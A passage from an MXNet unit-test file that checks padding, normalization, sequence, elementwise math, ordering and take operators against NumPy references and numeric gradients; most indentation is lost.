np_out = np.pad(x.asnumpy(), pad_grouped, mode)
# mxnet result
grad = mx.nd.empty(shape, ctx = xpu, dtype=dtype)
exec1 = Y.bind(xpu, args = [x], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# compare numpy + mxnet
assert_almost_equal(out, np_out)
# grad check
check_numeric_gradient(Y, [x.asnumpy()], numeric_eps=1e-2, rtol=1e-2)
@with_seed()
def test_pad():
ctx = default_context()
shape1 = (2, 3, 3, 5)
pad1 = (0, 0, 0, 0, 1, 2, 3, 4)
shape2 = (2, 3, 3, 5, 4)
pad2 = (0, 0, 0, 0, 1, 2, 3, 4, 3, 1)
# note: this op doesn't support ints yet. Add tests when supported
dtypes = ["float16", "float32", "float64"]
for dtype in dtypes:
check_pad_with_shape(shape1, ctx, pad1, 'constant', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'edge', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'constant', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'edge', dtype)
check_pad_with_shape(shape1, ctx, pad1, 'reflect', dtype)
check_pad_with_shape(shape2, ctx, pad2, 'reflect', dtype)
def np_instance_norm(data, weight, bias, eps):
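    """NumPy reference for InstanceNorm: normalize each sample/channel over its spatial
    dims, then scale by `weight` (gamma) and shift by `bias` (beta)."""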
spatial_dims = data.shape[2::]
num_spatial_vals = np.prod(np.array(spatial_dims))
scale = 1/float(num_spatial_vals)
sum_axis = tuple(range(2, data.ndim))
mean = scale * np.sum(data, axis = sum_axis)
mean = np.reshape(np.repeat(mean, num_spatial_vals), data.shape)
var = scale * np.sum((data - mean)**2, axis = sum_axis)
var = np.reshape(np.repeat(var, num_spatial_vals), data.shape)
weightBatch = np.tile(weight, (data.shape[0], 1))
weightBatch = np.reshape(np.repeat(weightBatch, num_spatial_vals), data.shape)
biasBatch = np.tile(bias, (data.shape[0], 1))
biasBatch = np.reshape(np.repeat(biasBatch, num_spatial_vals), data.shape)
return weightBatch * (data - mean)/np.sqrt(var + eps) + biasBatch
def check_instance_norm_with_shape(shape, xpu):
# bind with label
eps = 0.001
X = mx.symbol.Variable('X')
G = mx.symbol.Variable('G')
B = mx.symbol.Variable('B')
Y = mx.symbol.InstanceNorm(data=X, beta=B, gamma=G, eps=eps)
x = mx.random.normal(0, 1, shape, ctx=mx.cpu()).copyto(xpu)
gamma = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
beta = mx.random.normal(0, 1, shape[1], ctx=mx.cpu()).copyto(xpu)
np_out = np_instance_norm(x.asnumpy(), gamma.asnumpy(), beta.asnumpy(), eps)
exec1 = Y.bind(xpu, args = {'X':x, 'G':gamma, 'B':beta})
exec1.forward(is_train=False)
out = exec1.outputs[0].asnumpy()
assert_almost_equal(out, np_out, rtol=1e-4, atol=1e-4)
check_numeric_gradient(Y, {'X':x.asnumpy(), 'G':gamma.asnumpy(), 'B':beta.asnumpy()},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_instance_normalization():
check_instance_norm_with_shape((1, 1, 1), default_context())
check_instance_norm_with_shape((2, 1, 2), default_context())
check_instance_norm_with_shape((2,4,5,6), default_context())
check_instance_norm_with_shape((3,3,2,3,2,1,1), default_context())
def check_l2_normalization(in_shape, mode, dtype, norm_eps=1e-10):
ctx = default_context()
data = mx.symbol.Variable('data')
out = mx.symbol.L2Normalization(data=data, mode=mode, eps=norm_eps)
in_data = np.random.uniform(-1, 1, in_shape).astype(dtype)
# calculate numpy results
if mode == 'channel':
assert in_data.ndim > 2
np_norm = np.linalg.norm(in_data, axis=1) + norm_eps
np_norm = np.repeat(1. / np.expand_dims(np_norm, axis=1), in_data.shape[1], axis=1)
np_out = np.multiply(in_data, np_norm)
elif mode == 'spatial':
assert in_data.ndim > 2
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], s[1], -1)), axis=2) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // (s[0] * s[1]), axis=2)
np_out = np.multiply(in_data, np_norm.reshape(s))
elif mode == 'instance':
assert in_data.ndim > 1
s = in_data.shape
np_norm = np.linalg.norm(in_data.reshape((s[0], -1)), axis=1) + norm_eps
        np_norm = np.repeat(1. / np_norm[:, np.newaxis], in_data.size // s[0], axis=1)
np_out = np.multiply(in_data, np_norm.reshape(s))
else:
raise RuntimeError('Unknown l2 normalization mode')
exe = out.simple_bind(ctx=ctx, data=in_data.shape)
output = exe.forward(is_train=True, data=in_data)
# compare numpy + mxnet
    assert_almost_equal(exe.outputs[0].asnumpy(), np_out, rtol=1e-2 if dtype == 'float16' else 1e-5, atol=1e-5)
# check gradient
check_numeric_gradient(out, [in_data], numeric_eps=1e-3, rtol=1e-2, atol=5e-3)
@with_seed()
def test_l2_normalization():
for dtype in ['float16', 'float32', 'float64']:
for mode in ['channel', 'spatial', 'instance']:
nbatch = random.randint(1, 4)
nchannel = random.randint(3, 5)
height = random.randint(4, 6)
check_l2_normalization((nbatch, nchannel, height), mode, dtype)
width = random.randint(5, 7)
check_l2_normalization((nbatch, nchannel, height, width), mode, dtype)
def check_layer_normalization(in_shape, axis, eps, dtype=np.float32, forward_check_eps=1E-3):
def npy_layer_norm(data, gamma, beta, axis=1, eps=1E-5):
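        """NumPy reference for LayerNorm: normalize over `axis`, then apply gamma/beta."""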
if axis < 0:
axis += data.ndim
broadcast_shape = [1 for _ in range(data.ndim)]
broadcast_shape[axis] = data.shape[axis]
mean = data.mean(axis=axis, keepdims=True).astype(dtype)
var = data.var(axis=axis, keepdims=True).astype(dtype)
std = np.sqrt(var + dtype(eps)).astype(dtype)
out = np.reshape(gamma, broadcast_shape) * (data - mean) / std + \
np.reshape(beta, broadcast_shape)
return out
ctx = default_context()
data = np.random.normal(0, 1, in_shape).astype(dtype)
gamma = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
beta = np.random.normal(0, 1, (in_shape[axis],)).astype(dtype)
data_s = mx.symbol.Variable('data')
gamma_s = mx.symbol.Variable('gamma')
beta_s = mx.symbol.Variable('beta')
out_s = mx.symbol.LayerNorm(data=data_s, gamma=gamma_s, beta=beta_s, axis=axis, eps=eps)
exe = out_s.simple_bind(ctx, data=in_shape)
exe.arg_dict['data'][:] = data
exe.arg_dict['gamma'][:] = gamma
exe.arg_dict['beta'][:] = beta
out_nd = exe.forward()[0]
out = npy_layer_norm(data, gamma, beta, axis, eps)
assert_almost_equal(out, out_nd.asnumpy(), forward_check_eps, forward_check_eps)
for req in ['write', 'add']:
check_numeric_gradient(out_s, {'data': data, 'gamma': gamma, 'beta': beta},
grad_nodes={'data': req, 'gamma': req, 'beta': req},
numeric_eps=1e-2, rtol=1e-2, atol=1e-2)
@with_seed()
def test_norm():
try:
import scipy
assert LooseVersion(scipy.__version__) >= LooseVersion('0.1')
from scipy.linalg import norm as sp_norm
except (AssertionError, ImportError):
print("Could not import scipy.linalg.norm or scipy is too old. "
"Falling back to numpy.linalg.norm which is not numerically stable.")
from numpy.linalg import norm as sp_norm
def l1norm(input_data, axis=0, keepdims=True):
return np.sum(abs(input_data), axis=axis, keepdims=keepdims)
def l2norm(input_data, axis=0, keepdims=True):
return sp_norm(input_data, axis=axis, keepdims=keepdims)
ctx = default_context()
data = mx.symbol.Variable('data')
in_data_dim = random_sample([4,5,6], 1)[0]
in_shape = rand_shape_nd(in_data_dim, dim=5)
epsilon = 1e-3
acc_type = {np.float16: np.float32, np.float32: np.float32, np.float64: np.float64}
for order in [1, 2]:
for dtype in [np.float16, np.float32, np.float64]:
for i in range(in_data_dim):
for out_dtype in ['float32', 'float64']:
backward_dtype = np.float32 if out_dtype == 'float32' else np.float64
print(order, dtype, i, out_dtype, in_shape)
in_data = np.random.uniform(-1, 1, in_shape).astype(acc_type[dtype])
in_data[abs(in_data) < epsilon] = 2 * epsilon
norm_sym = mx.symbol.norm(data=data, ord=order, axis=i, out_dtype=out_dtype, keepdims=True)
                    npy_out = l1norm(in_data, i) if order == 1 else l2norm(in_data, i)
                    npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data.astype(dtype)], [npy_out.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx)
check_symbolic_backward(norm_sym, [in_data.astype(dtype)],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward], rtol=1e-3, atol=1e-5, ctx=ctx,
dtype=backward_dtype)
# Disable numeric gradient https://github.com/apache/incubator-mxnet/issues/11509
# check gradient
if dtype is not np.float16:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
if i < in_data_dim-1:
norm_sym = mx.symbol.norm(data=data, ord=order, axis=(i, i+1), keepdims=True)
                        npy_out = l1norm(in_data, (i, i+1)) if order == 1 else l2norm(in_data, (i, i+1))
                        npy_out_backward = np.sign(in_data) if order == 1 else in_data/npy_out
check_symbolic_forward(norm_sym, [in_data], [npy_out.astype(dtype)],
                                               rtol=1e-3, atol=1e-5, ctx=ctx)
check_symbolic_backward(norm_sym, [in_data],
[np.ones(npy_out.shape).astype(out_dtype)],
[npy_out_backward.astype(out_dtype)],
rtol=1e-3, atol=1e-5, ctx=ctx, dtype=backward_dtype)
# check gradient
if dtype is not np.float16:
check_numeric_gradient(norm_sym, [in_data], numeric_eps=epsilon,
rtol=1e-1, atol=1e-3, dtype=backward_dtype)
@with_seed()
def test_layer_norm():
for dtype, forward_check_eps in zip([np.float16, np.float32, np.float64],
[1E-2, 1E-3, 1E-4]):
for in_shape in [(10, 6, 5), (10, 10)]:
for axis in range(-len(in_shape), len(in_shape)):
for eps in [1E-2, 1E-3]:
check_layer_normalization(in_shape, axis, eps, dtype=dtype,
forward_check_eps=forward_check_eps)
# Numpy Implementation of Sequence Ops
def sequence_last_numpy(array, lengths, axis):
# create new array of dims [batch, seqlen, ...]
array2 = np.moveaxis(array, axis, 1)
dims = array2.shape
if lengths is None:
return array2[:, -1]
lengths = list(lengths)
return np.array([array2[i, int(lengths[i]) - 1] for i in range(dims[0])])
def sequence_mask_numpy(array, lengths, axis, value):
if lengths is None:
return array
arrayMask = array.copy()
# conform to [batch, seqlen, ...]
arrayMask = np.moveaxis(arrayMask, axis, 1)
shape = arrayMask.shape
lengths = list(lengths)
for i in range(shape[0]):
arrayMask[i, int(lengths[i]):] = value
return np.moveaxis(arrayMask, 1, axis)
def sequence_reverse_numpy(array, lengths, axis):
rarray = array.copy()
# conform to [batch, seqlen, ...]
rarray = np.moveaxis(rarray, axis, 1)
shape = rarray.shape
if lengths is None:
lengths = [shape[1]] * shape[0]
lengths = list(lengths)
for i in range(shape[0]):
j = int(lengths[i])
rarray[i,:j] = rarray[i,:j][::-1]
return np.moveaxis(rarray, 1, axis)
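# Shared driver for SequenceLast/SequenceMask/SequenceReverse: runs the symbol on
# random inputs (with and without explicit sequence lengths), compares against the
# NumPy references above, and checks numeric gradients for 'write', 'add' and
# 'null' gradient requests on the data input.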
def check_sequence_func(ftype, mask_value=0, axis=0):
# bind with label
xpu = default_context()
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L') # lengths
shapes = [(3, 4), (1, 1), (3, 4, 3, 1, 1)]
for seqlenQ in [True, False]:
for ary_dtype in [np.float32]:
for idx_dtype in [np.int32, np.float32]:
for s in shapes:
x = mx.random.uniform(-1, 1, s, ctx=mx.cpu()).astype(ary_dtype).copyto(xpu)
batch = s[1] if (axis == 0) else s[0]
seqlen = s[axis]
l_np = np.random.randint(1, seqlen + 1, batch)
l = mx.nd.array(l_np, ctx=mx.cpu(), dtype=idx_dtype).copyto(xpu)
if not seqlenQ:
l_np = None
args = {'data':X, 'use_sequence_length':seqlenQ, "axis":axis}
if seqlenQ:
args['sequence_length'] = L
if ftype == "last":
Y = mx.symbol.SequenceLast(**args)
np_out = sequence_last_numpy(x.asnumpy(), l_np, axis)
elif ftype == "mask":
args['value'] = mask_value
Y = mx.symbol.SequenceMask(**args)
np_out = sequence_mask_numpy(x.asnumpy(), l_np, axis, mask_value)
elif ftype == "reverse":
Y = mx.symbol.SequenceReverse(**args)
np_out = sequence_reverse_numpy(x.asnumpy(), l_np, axis)
fargs = [x, l] if seqlenQ else [x]
gargs = [x.asnumpy(), l_np] if seqlenQ else [x.asnumpy()]
check_symbolic_forward(Y, fargs, [np_out], dtype="asnumpy")
check_numeric_gradient(Y, gargs, grad_nodes={'X':'write'},
numeric_eps=1e-2, rtol=1e-2)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'add'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
check_numeric_gradient(Y, gargs, grad_nodes={'X':'null'},
numeric_eps=1e-3, rtol=1e-2, atol=1E-4)
@with_seed()
@unittest.skip("Flaky test: https://github.com/apache/incubator-mxnet/issues/11395")
def test_sequence_last():
check_sequence_func("last", axis=0)
check_sequence_func("last", axis=1)
@with_seed()
def test_sequence_mask():
check_sequence_func("mask", axis = 0, mask_value=-2.3)
check_sequence_func("mask", axis = 1, mask_value=0.3)
def check_sequence_reverse(xpu):
# sample data
arr = np.array(
[[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr1 = np.array(
[[[ 13., 14., 15.],
[ 16., 17., 18.]],
[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]]])
arr2 = np.array(
[[[ 7., 8., 9.],
[ 10., 11., 12.]],
[[ 1., 2., 3.],
[ 4., 5., 6.]],
[[ 13., 14., 15.],
[ 16., 17., 18.]]])
arr3 = np.array(
[[[ 7., 8., 9.],
[ 16., 17., 18.]],
[[ 1., 2., 3.],
[ 10., 11., 12.]],
[[ 13., 14., 15.],
[ 4., 5., 6.]]])
# test for matrix case
seq_len_1 = [1, 2, 2]
arr_4 = np.array([[7., 8., 9.], [16., 17., 5.4]], dtype=np.float32)
arr_5 = np.array([[7., 17., 5.4], [16., 8., 9.]], dtype=np.float32)
def test_wrapper(arr, xpu, sequence_length=None, use_sequence_length=False):
# MxNet symbol creation
seq = mx.sym.Variable('seq')
if sequence_length and use_sequence_length:
seq_len = mx.sym.Variable('seq_len')
else:
# ensure that both are disabled, not just one
seq_len=None
use_sequence_length=False
rev = mx.sym.SequenceReverse(data=seq, sequence_length=seq_len, use_sequence_length=use_sequence_length)
# MxNet symbol execution
if sequence_length:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr), 'seq_len': mx.nd.array(sequence_length)})
else:
bound = rev.bind(xpu, {'seq': mx.nd.array(arr)})
fwd = bound.forward()
return fwd[0].asnumpy()
# test cases
assert_array_equal(test_wrapper(arr, xpu, use_sequence_length=False), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[3, 3], use_sequence_length=True), arr1)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 2], use_sequence_length=True), arr2)
assert_array_equal(test_wrapper(arr, xpu, sequence_length=[2, 3], use_sequence_length=True), arr3)
assert_array_equal(test_wrapper(arr_4, xpu, sequence_length=seq_len_1, use_sequence_length=True), arr_5)
@with_seed()
def test_sequence_reverse():
check_sequence_func("reverse", axis=0)
check_sequence_reverse(mx.cpu())
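# Helper for elementwise binary math ops: compares the forward output and the
# gradients w.r.t. both inputs against user-supplied NumPy reference callables.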
def mathematical_core_binary(name,
forward_mxnet_call,
forward_numpy_call,
backward_numpy_call1,
backward_numpy_call2,
data1_init=2.,
data2_init=3.,
grad_init=2.):
    data1 = mx.symbol.Variable('data1')
    data2 = mx.symbol.Variable('data2')
shape = (3, 4)
data_tmp1 = np.random.rand(3, 4)
data_tmp2 = np.random.rand(3, 4)
data_tmp1[:] = data1_init
data_tmp2[:] = data2_init
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = forward_mxnet_call(data1, data2)
exe_test = test.bind(default_context(), args=[arr_data1, arr_data2], args_grad=[arr_grad1, arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp1, data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = grad_init
npout_grad1 = npout_grad * backward_numpy_call1(data_tmp1, data_tmp2)
npout_grad2 = npout_grad * backward_numpy_call2(data_tmp1, data_tmp2)
arr_grad1 = arr_grad1.asnumpy()
arr_grad2 = arr_grad2.asnumpy()
assert_almost_equal(arr_grad1, npout_grad1)
assert_almost_equal(arr_grad2, npout_grad2)
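# Helper for elementwise unary math ops: checks the forward result and the input
# gradient (chain rule with a constant output gradient) against NumPy references.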
def mathematical_core(name, forward_mxnet_call, forward_numpy_call, backward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = grad_init
npout_grad = out_grad.asnumpy()
temp = backward_numpy_call(data_tmp)
npout_grad = npout_grad * temp
exe_test.backward(out_grad)
arr_grad = arr_grad.asnumpy()
# print(name)
# print(arr_grad)
# print(npout_grad)
assert_almost_equal(arr_grad, npout_grad)
@with_seed()
def test_special_functions_using_scipy():
try:
from scipy import special as scipy_special
    except ImportError:
print("Could not import scipy. Skipping unit tests for special functions")
return
# gamma
mathematical_core("gamma", lambda x: mx.sym.gamma(x), lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x), 0.5, 0.5)
# gammaln
mathematical_core("gammaln", lambda x: mx.sym.gammaln(x), lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x), 0.5, 0.5)
# erf
mathematical_core("erf", lambda x: mx.sym.erf(x), lambda x: scipy_special.erf(x),
lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
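# Rounding ops (rint, fix) have zero gradient almost everywhere, so only the
# forward result is compared against the NumPy reference here.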
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/12901")
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp < 0.6, [1], [0]) * np.where(data_tmp > -0.6, [1], [0])])
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0].asnumpy(), np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out.asnumpy())
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0].asnumpy(), np.array([0,1,2,3,4]))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
@with_seed()
def test_order():
ctx = default_context()
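    # Ground-truth top-k built from numpy argsort/sort; with mode='wrap', negative
    # indices select the k largest entries when is_ascend is False.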
def gt_topk(dat, axis, ret_typ, k, is_ascend):
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
                        for kk in range(5):
                            ret[i, gt_argsort[i, :, j, kk], j, kk] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
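    # Builds a 100 x 300096 matrix whose rows are independently shuffled permutations,
    # used below to exercise topk on a large input.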
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
is_ascend=False)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0].asnumpy(), a_npy)
exe.backward() # No error if BlockGrad works
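# test_take covers mx.nd/sym.take for 'clip' and 'wrap' modes over random data/index
# shapes and axes; grad_helper builds the expected input gradient by adding 1 at
# every position selected by an index.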
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
